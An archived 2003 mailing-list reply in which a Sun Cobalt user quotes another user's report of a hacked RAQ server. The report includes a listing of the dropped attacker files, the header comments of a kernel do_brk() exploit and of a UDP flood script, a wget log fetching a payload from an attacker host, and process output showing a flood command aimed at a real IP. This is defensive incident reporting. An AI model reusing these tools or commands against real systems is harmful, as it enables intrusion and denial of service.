[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] RAQ hacked and scripts installed: r0nin, milk

Subject: RE: [cobalt-users] RAQ hacked and scripts installed: r0nin, milk
From: "Chuck Lewis" <clewis@xxxxxxxxxx>
Date: Thu Dec 18 11:03:01 2003
List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>

Herby,

Did you run that check in the link you mention ?

And for anyone that is language challenged (like me) you can run that page
through Babelfish (French to English) at
http://babelfish.altavista.com/babelfish/tr

Chuck


-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx] On Behalf Of Herby K
Sent: Thursday, December 18, 2003 5:31 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] RAQ hacked and scripts installed: r0nin, milk

Hi,

the files were in

ls -l /home/tmp/
total 151
----------    1 nobody   nobody      30127 Dec 18 09:07 km
----------    1 nobody   nobody      24583 Dec 18 09:07 kmod
----------    1 nobody   nobody       1730 Dec 18 09:07 l.asm --> 1)
----------    1 nobody   nobody       1465 Dec 18 09:07 mdelry.sh  -->
deleted the logfiles
----------    1 nobody   nobody      24006 Dec 18 09:07 milk
----------    1 nobody   nobody      41876 Dec 18 09:07 own
----------    1 nobody   nobody      19242 Dec 18 09:07 r0nin
----------    1 nobody   nobody       1089 Dec 18 09:07 udp.pl --> 2)
----------    1 nobody   nobody        710 Dec 18 09:07 wget-log --> 3)

the files were owner httpd and group root

1)
; The following program can be used to test if a x86 Linux system
; is vulnerable to the do_brk() exploit; use at your own risk.
; by Christophe Devine
; Linux Kernel 2.4.22 "do_brk()" Proof of Concept
; Advisory FR : http://www.k-otik.net/bugtraq/12.02.Kernel.2422.php

2)
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

3)
--04:33:19--  http://www.viperhaxu.hpg.com.br/kmod
           => `kmod.1'
Resolving www.viperhaxu.hpg.com.br... done.
Connecting to www.viperhaxu.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.viperhaxu.hpg.ig.com.br/kmod [following]
--04:40:29--  http://www.viperhaxu.hpg.ig.com.br/kmod
           => `kmod.1'
Resolving www.viperhaxu.hpg.ig.com.br... done.
Connecting to www.viperhaxu.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,248 [text/plain]

    0K .......... .......... .......                         100%   30.75
KB/s

04:40:32 (30.75 KB/s) - `kmod.1' saved [28248/28248]
~


The rest of the files are binary.

The ps -ax output of the problematic lines:


25889 ?        S      0:00 ./r0nin
28922 ?        S      0:00 ./r0nin
28923 ttyp1    S      0:00 sh -i
20515 ?        S      0:00 ./r0nin
20516 ttyp2    S      0:00 sh -i
20603 ttyp2    T      9:10 perl udp.pl 200.234.87.71 80 5000
20605 ttyp2    T      0:00 sh -c (sleep 5000;killall -9 udp) &
20606 ttyp2    T      0:00 sleep 5000

as the logfiles were deleted we do not know how they came in.

Do you have any experiance or infos regarding this ?

thx
Herby

_____________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To subscribe/unsubscribe, or to SEARCH THE ARCHIVES, go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users

References:
- [cobalt-users] RAQ hacked and scripts installed: r0nin, milk
  - From: Herby K

Prev by Date: Re: [cobalt-users] RAQ4i : webserver down
Next by Date: Re: [cobalt-users] Wierd Raq 2 problem
Previous by thread: [cobalt-users] RAQ hacked and scripts installed: r0nin, milk
Next by thread: [cobalt-users] Spamassassin subject rewriting

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index